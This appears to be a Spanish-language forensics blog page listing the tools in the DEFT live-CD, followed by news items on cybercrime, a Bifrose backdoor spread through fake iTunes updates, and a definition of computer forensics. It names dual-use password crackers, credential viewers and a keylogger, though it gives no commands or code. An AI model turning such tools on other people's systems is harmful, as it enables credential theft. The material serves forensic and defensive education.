mount manager 0.2.6, advanced and user friendly mount manager
scalpel 1.60, carving tool
wipe
hex dump, combined hex and ascii dump of any file
outguess, a stegano tool
ophcrack 3.3.0, Windows password recovery
Xplico 0.6 DEFT edition, advanced network analyzer
Wireshark 1.2.2, network sniffer
ettercap 0.7.3, network sniffer
nessus 4, vulnerability and security scanner, client
nessusd 4, vulnerability and security scanner, server
nmap 5, the best network scanner
kismet 2008.05 R1, sniffer and intrusion detection system that work with any wireless card
dmraid, discover software RAID devices
testdisk, tool to recover damaged partitions
vinetto, tool to examine Thumbs.db files
trID 2.02 DEFT edition, tool to identify file types from their binary signatures
readpst 0.6.41, a tools to read ms-Outlook pst files
snmpwalk
chkrootkit, Checks for signs of rootkits on the local system
rkhunter 1.3.4, rootkit, backdoor, sniffer and exploit scanner
john 1.7.2, john the ripper password cracker
clam, antivirus 4.15

---------------DEFT extra 2.0:

System Information
Drive Manager
Reg Scanner
Win Audit
ReSysInfo
USB Deview
Bluethoot View
User Assist view
WRR
My Event View
MSI
Curr Proces
Live Acquisition
FTK imager
Winen
MDD
Forensics Tool
WFT
Zero View
WFA
File Alyser
Nigilant32
USB history
Shell command
PC on/off time
Password Recovery
Asterix logger
PassworFox
Chrome Pass
IE PassView
Wireless Key View
Mail pass view
Incredimail Message Extractor
Networking
Web Browser
IE Cookie View
IE History View
Mozilla Cookie View
Mozilla History View
Mozilla Cache view
Opera Cache View
Chrome Cache View
Index.dat Analyzer 2.0
Historian
FoxAnalisis
Utility tool
Skype Log View
Home Keylogger
HexEdit
SDHash
WipeDisk
USBWriteProtector
Testdisk
LTF View
AVI screen
Hower Snap
VNC Viewer
Sumatra PDF
Putty
Pre-Search
Photorec
Notepad++
WinMD5sum
Abiword
Undelete Plus
Hash calc
IP Net Info
SysInternal
Access Enum
autoruns
diskView
Regmon
WinOBj
Filemon
ProceXp
TCPView
Rootkit Revealer


---------------DEFT v5 features list:

incorruptibility of the partitions
incorruptibility of the swap spaces

linux Kernel 2.6.31

LXDE
apt-get system
vino
rdesktop
samba client
open SSH client & server
ntfs3g
lvm support
brasero
record my desktop
wicd network manager
speedcrunch

 Fuentes     :  http://www.deftlinux.net/, http://distrowatch.com/table.php?distribution=deft
 Descargar : http://www.mirrordeft.net/listing/deft/deftv5x.iso

Delitos cibernéticos y contra menores

Todo dispositivo equipado con memoria es analizable.
Todo e-mail es rastreable

Durante una conferencia tuvieron que apagarse las cámaras, y se pidió a los periodistas respetar la identidad del conferencista que en unos pocos minutos iniciaría una charla titulada

Se trataba de un representante de la Policía Cibernética, una de las divisiones de la Policía Federal -que antes pertenecía a la PFP-.

Por telenovelesco que parezca, el staff de esta unidad de investigación emplea su tiempo en monitorear Internet con el fin de rastrear todo tipo de delitos cibernéticos, y para ello cuentan con subáreas con gente especializada.

Los delitos perseguidos son muchos más de los que quisiéramos reconocer que existen: Explotación, turismo sexual, menores desaparecidos, redes de pederastas…

“Un 40% de los delitos cibernéticos se están cometiendo a través de cafés Internet”, explica.

Lo que sucede es que estos establecimientos no tienen ningún tipo de regulación, e Internet es un medio en el que se consigue estar casi en el anonimato: Una conexión casera es rastreable, pero para cuando llegas al café Internet la persona ya se fue y nadie sabe nada.

“Es terrible lo que se puede encontrar en la red”, dice el representante de la institución.

Los menores de edad se sienten seguros detrás de su monitor, sin embargo, los depredadores conocen perfectamente las técnicas que mejor funcionan para embaucarlos, e incluso están actualizados en los temas de moda entre los adolescentes (videojuegos, juguetes electrónicos, cantantes).

El aparentemente inofensivo chat es uno de los medios que más se están utilizando para explotar menores, puesto que personas sin escrúpulos aprovechan la curiosidad de éstos, e intentan ganarse su confianza por todos los medios.

“Se reporta que a los escasos 10 minutos de hacer contacto a través de Internet, un pedófilo es capaz de obtener imágenes de un menor”, dice sin más, mientras el auditorio permanece azorado.

“A los quince días de haberse conocido a través del chat, es capaz de tener contacto físico”, continúa. Los detalles son escalofriantes.

Lagunas legales.

Andrés Velázquez, director de investigaciones digitales y fundador de Mattica -el primer laboratorio de cómputo forense en América Latina- deja muy claro que el único sistema totalmente seguro es aquél que está apagado, desconectado, guardado en una caja fuerte de titanio… Ya se sabe el chiste, que a final de cuentas no es tan gracioso.

“En China vulnerar un servidor es pena de muerte. En Finlandia al que meten a la cárcel es al administrador de sistemas por negligencia, y en México si matan a alguien con un ratón, es un delito informático”, dice con sorna.

Existe un desconocimiento general sobre qué es y qué no es un delito informático, y el hecho de que los países no logren ponerse de acuerdo no facilita el trabajo.

“Los delitos informáticos no son nada más hackear”, explica.

Imagine, por ejemplo, que se contrata un sicario a través de un chat, o vía correo electrónico. O considere los crackers…

“Hoy en día es más rentable ser cracker que ser narcotraficante”, dice, sin parpadear.

Sin embargo, del delito informático más común -o al menos el más perseguido a nivel privado- no es ni el phishing ni el típico fraude nigeriano. Aunque las tendencias apuntan al lavado de dinero, el crimen organizado (planeación de homicidios, secuestros, pornografía infantil) y los fraudes vía portales financieros, el porcentaje más elevado (35%) de los delitos informáticos se concentra en el robo de secretos industriales, el 82% de los cuales son llevados a cabo por empleados.

Las amenazas y difamación representan un 30% de los delitos, mientras que los fraudes y el abuso de confianza -el contador que deposita la mitad en el SAT y la otra mitad en una cuenta personal- integran un 20%.

Cuerpo del delito

El gran riesgo ya no son los virus, sino los gusanos capaces de robar información.

“Existen troyanos que afectan directamente al ruteador de Infinitum redireccionando a páginas clonadas para obtener contraseñas”, dice el fundador de Mattica.

“Vemos Internet como si fuera un medio confiable, cuando realmente no lo es”, indica.

¿Ha visto el programa CSI (Crime Scene Investigation)? Siempre hay tres elementos: La escena del crimen, un cuerpo y un arma. Lo primero que se hace es aislar la escena para evitar que se contamine.

Eso es exactamente lo que hace un experto en cómputo forense, sólo que en este caso el cuerpo del delito puede ser un archivo o un disco duro, y el arma puros ceros y unos (lenguaje binario), por lo que es en extremo importante generar un buen procedimiento del manejo de la evidencia, y es que la evidencia digital o electrónica es muy frágil.

Sin embargo, todo dispositivo equipado con memoria es analizable. Todo correo electrónico es rastreable. Los archivos son recuperables aunque hayan sido borrados.


“Soy el único ingeniero que van a conocer que siempre trae el Código Penal en la mano”, aclara.

Fuente: Elimparcial.com

8 de mayo de 2010

F.I.R.E.: Forensic and Incident Response Environment

F.I.R.E. es una CD Live basado en Linux Knoppix. F.I.R.E. es una herramienta usada para el analisis forense, analisis de virus, recuperación de datos, herramientas de red, etc.

Además, tenemos la opción de trabajar bajo una interfaz gráfica que nos facilita el uso de esta herramienta o directamente bajo comandos.

Si trabajamos bajo una interfaz, dispondremos de cuatro terminales donde realizaremos nuestros comandos al mismo tiempo junto con un menú desplegable que nos mostrará todas las herramientas y utilidades que podemos usar.


Fuente:      http://fire.dmzs.com/
Descargar: http://prdownloads.sourceforge.net/biatchux/fire-0.3.5b.iso?download
Manual:     http://www.dmzs.com/~dmz/David_Zendzian_GCFA.pdf
Usuarios de iPad son el nuevo objetivo de hackers

Un e-mail que invita a descargar una actualización de iTunes expone a los usuarios a un código malicioso que permite sustraer contraseñas y datos críticos y que permite al ciberdelincuente controlar remotamente el equipo afectado.

Las altas cifras de ventas de los iPads, están llevando a los ciberdelincuentes a fijarse como objetivo a los usuarios de dichos dispositivos. En este ataque, del que informa BitDefender, los usuarios del iPad reciben un correo electrónico no solicitado en el que se les invita a descargar en sus PCs la última versión de iTunes –uno de los programas más usados de Apple- como paso previo a una actualización del software de su iPad.


Para dar mayor credibilidad al mensaje, éste incide en que los usuarios deben mantener actualizado su software para lograr un mayor rendimiento, disfrutar de nuevas características e incrementar su nivel de seguridad. El email no solicitado incluye un enlace que conduce, supuestamente, a la descarga de una actualización de iTunes. Si un usuario sigue ese vínculo será redirigido a una página web que imita la original de descarga de dicho programa de Apple.

Lo que se descarga no es una actualización de iTunes, sino un backdoor identificado por BitDefender como Backdoor.Bifrose.AADY. Este código malicioso está diseñado para inyectarse en el proceso explorer.exe y abrir una puerta trasera en el equipo, de modo que éste pueda ser controlado remotamente por el ciberdelincuente.

Por otra parte, a través de esta puerta trasera se puede llegar a leer las claves y números de serie de los distintos programas de software instalados en el ordenador afectado, así como las contraseñas de Messenger, cuentas de correo POP3, y unidades de almacenamiento protegidas.

Fuente: DiarioTI

Definicion de Computo forense


Es la aplicación de técnicas científicas y analíticas especializadas a infraestructura tecnológica que permiten identificar, preservar, analizar y presentar datos que sean válidos dentro de un proceso legal.

1.- La identificación de evidencia digital.- Sabiendo qué evidencia está presente, dónde y
como se guarda, es vital determinar qué procesos serán empleados para efectuar su
recuperación. No solo los ordenadores son el centro de la informática forense, en la realidad
el concepto puede extenderse a cualquier dispositivo electrónico que sea capaz de
almacenar información, como los teléfonos celulares, las agendas electrónicas, las tarjetas
flash, reproductores de mp3 y mp4 ya que ellas también son capaces de almacenar
información.
2.- Preservación de la evidencia digital.- El examen de los datos electrónicamente
guardados se debe llevar a cabo de la manera menos intrusiva posible, es por ello por lo que
se trabaja sobre imágenes o copias de la data.
3.- El análisis de la evidencia digital.- La extracción, procesamiento e interpretación de los
datos digitales, se consideran generalmente como los elementos principales de la
informática forense. Una vez obtenida, la evidencia digital, normalmente requiere de un
proceso, antes que pueda ser legible por las personas.
4.- La presentación de evidencia digital.- Incluye la manera formal de la presentación y la
credibilidad de los procesos que se emplearon para producir la evidencia ya que si se usa un
programa que no interpreta cada dato con precisión y exactitud, el significado entero del
documento puede cambiar.
Fuente : Recopilado por Maverick